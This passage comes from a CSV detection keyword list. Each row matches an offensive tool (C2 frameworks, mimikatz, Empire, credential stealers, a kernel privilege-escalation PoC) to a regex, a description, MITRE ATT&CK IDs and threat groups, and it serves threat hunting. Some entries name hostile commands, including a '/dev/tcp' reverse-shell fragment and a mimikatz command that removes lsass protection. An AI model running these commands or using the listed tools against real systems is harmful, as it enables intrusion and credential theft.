-z -s 3 -j 1 -u *.txt*",".{0,1000}\s\-x\s\-z\s\-s\s3\s\-j\s1\s\-u\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* x11-access.nse*",".{0,1000}\sx11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xdmcp-discover.nse*",".{0,1000}\sxdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmlrpc-methods.nse*",".{0,1000}\sxmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-brute.nse*",".{0,1000}\sxmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-info.nse*",".{0,1000}\sxmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xpipe*",".{0,1000}\sxpipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "* XRulez.cpp*",".{0,1000}\sXRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "* Xworm v*",".{0,1000}XWorm\s(V|v)\d+\.\d+.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "* Your payload has been delivered*",".{0,1000}\sYour\spayload\shas\sbeen\sdelivered.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -z burplog*",".{0,1000}\s\-z\sburplog.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*!! 
>> if you did this while in the root shell, the terminal will be messed up << !!*",".{0,1000}!!\s\>\>\sif\syou\sdid\sthis\swhile\sin\sthe\sroot\sshell,\sthe\sterminal\swill\sbe\smessed\sup\s\<\<\s!!.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*!!! Are you sure you are running as the AD FS service account?*",".{0,1000}!!!\sAre\syou\ssure\syou\sare\srunning\sas\sthe\sAD\sFS\sservice\saccount\?.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*!autoruns *",".{0,1000}!autoruns\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!files upload *",".{0,1000}!files\supload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!handlers load *",".{0,1000}!handlers\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!implants *",".{0,1000}!implants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!interactive *",".{0,1000}!interactive\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!modules load *",".{0,1000}!modules\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!processprotect *lsass.exe*",".{0,1000}!processprotect\s.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. 
command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*!put */tmp*",".{0,1000}!put\s.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!shell *",".{0,1000}!shell\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!tunnels --tcp*",".{0,1000}!tunnels\s\-\-tcp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!use *aes256_py*",".{0,1000}!use\s.{0,1000}aes256_py.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!use *reflected_assembly*",".{0,1000}!use\s.{0,1000}reflected_assembly.{0,1000}","offensive_tool_keyword","Nuages","A modular 
C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!wPkgPath!*!ak!*",".{0,1000}!wPkgPath!.{0,1000}!ak!.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*""active_wraith_clients""*",".{0,1000}\""active_wraith_clients\"".{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*""ADWS request 
with ldapbase (*",".{0,1000}\""ADWS\srequest\swith\sldapbase\s\(.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*""bypass-clm""*",".{0,1000}\""bypass\-clm\"".{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*""-c \""sh -i >& /dev/tcp/*",".{0,1000}\""\-c\s\\\""sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*""Dump BH data""*",".{0,1000}\""Dump\sBH\sdata\"".{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*""Evilginx Mastery Course""*",".{0,1000}\""Evilginx\sMastery\sCourse\"".{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*""Generate reverse shell 
payloads.""*",".{0,1000}\""Generate\sreverse\sshell\spayloads\.\"".{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*""Granted user * DCSYNC rights!*",".{0,1000}\""Granted\suser\s.{0,1000}\sDCSYNC\srights!.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*""iN""+""voK""+""e""+""-""+""eXP""+""re""+""sSi""+""oN""*",".{0,1000}\""iN\""\+\""voK\""\+\""e\""\+\""\-\""\+\""eXP\""\+\""re\""\+\""sSi\""\+\""oN\"".{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*""Injecting shellcode into PowerShell""*",".{0,1000}\""Injecting\sshellcode\sinto\sPowerShell\"".{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*""localadmin123!""*",".{0,1000}\""localadmin123!\"".{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator 
access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*""N/A (Likely Pirated)""*",".{0,1000}\""N\/A\s\(Likely\sPirated\)\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*""NSA0XF$""*",".{0,1000}\""NSA0XF\$\"".{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*""sacrificialO365Passwords"": *",".{0,1000}\""sacrificialO365Passwords\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*""sacrificialO365Username"": *",".{0,1000}\""sacrificialO365Username\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for 
enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*""small web shell by zaco*",".{0,1000}\""small\sweb\sshell\sby\szaco.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*""Stardust MessageBox""*",".{0,1000}\""Stardust\sMessageBox\"".{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*""Starting Elevating to SYSTEM""*",".{0,1000}\""Starting\sElevating\sto\sSYSTEM\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*""Starting WD Disable""*",".{0,1000}\""Starting\sWD\sDisable\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense 
Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*""Successful Connection PME""*",".{0,1000}\""Successful\sConnection\sPME\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*""The LaZagne project""*",".{0,1000}\""The\sLaZagne\sproject\"".{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*""User32LogonProcesss""*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A" "*""WorkstationName"">RULER*",".{0,1000}\""WorkstationName\""\>RULER\<\/Data\>.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*# @oldboy21*",".{0,1000}\#\s\s\@oldboy21.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*# Add random newlines to the obfuscated code*",".{0,1000}\#\sAdd\srandom\snewlines\sto\sthe\sobfuscated\scode.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*# Author: Dahvid Schloss a.k.a APT Big Daddy*",".{0,1000}\#\sAuthor\:\sDahvid\sSchloss\sa\.k\.a\sAPT\sBig\sDaddy.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*# Author: Panagiotis 
Chartas (t3l3machus)*",".{0,1000}\#\sAuthor\:\sPanagiotis\sChartas\s\(t3l3machus\).{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*# download virRu5*",".{0,1000}\#\sdownload\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*# execute virRu5*",".{0,1000}\#\sexecute\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*# Force Admin: Bypass Admin Privileges?*",".{0,1000}\#\sForce\sAdmin\:\sBypass\sAdmin\sPrivileges\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP 
